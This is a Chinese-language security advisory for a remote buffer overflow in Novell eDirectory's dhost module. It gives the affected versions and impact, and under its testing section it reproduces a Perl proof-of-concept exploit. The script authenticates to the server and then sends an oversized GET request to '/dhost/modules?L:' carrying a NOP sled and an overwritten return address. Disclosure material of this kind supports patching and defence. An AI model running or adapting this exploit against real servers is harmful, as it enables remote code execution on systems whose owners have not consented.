Novell eDirectory ‘/dhost/modules?L:’缓冲区溢出漏洞

漏洞起因
边界条件错误
 
影响系统
Novell eDirectory 8.8.2 ftf2
Novell eDirectory 8.8.2
Novell eDirectory 8.8.1
Novell eDirectory 8.8 SP5
Novell eDirectory 8.8 SP4 FTF1
Novell eDirectory 8.8 SP4
Novell eDirectory 8.8 SP3 FTF3
Novell eDirectory 8.8 SP3
Novell eDirectory 8.8 SP2
Novell eDirectory 8.8 SP1
Novell eDirectory 8.8
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限执行任意指令。
 
攻击所需条件
攻击者必须访问Novell eDirectory。
 
漏洞信息
Novell eDirectory是一款跨平台的目录服务器。
Novell eDirectory dhost模块存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
畸形HTTP GET请求给/dhost/modules?L:可触发缓冲区溢出,成功利用漏洞可允许任意代码执行。
 
测试方法
#PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln – 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net ||
www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$target=$ARGV[0];
if(!$ARGV[0]){
        print "Novell eDirectory 8.8 SP5 Exploit\n";
        print "Hellcode Research || Hellcode.net\n";
        print "Usage:perl $0 [target]\n";
 
exit();
}
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/";
$vuln = "modules?L:";
$nop = "\x90" x 1668;
$eip = "\xef\xbe\xad\xde";
$data = "B" x 235;
$hellcode = $vuln.$nop.$eip.$data;
########Write your usr and pwd########
   $username = "Admin.context";
    $password = "1234";
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new(‘GET’, "$login_url"));
    $mechanize->submit_form(
                  form_name => "authenticator",
                  fields    => {       
           
                     usr => $username,
                     pwd => $password},
                     button => ‘Login’);
$response2 = $mechanize->get("$url$hellcode");
 
厂商解决方案
目前没有详细解决方案提供:
http://www.novell.com/products/edirectory/
 
漏洞提供者
karak0rsan and murderkey from Hellcode Research
  

发表评论?

0 条评论。

发表评论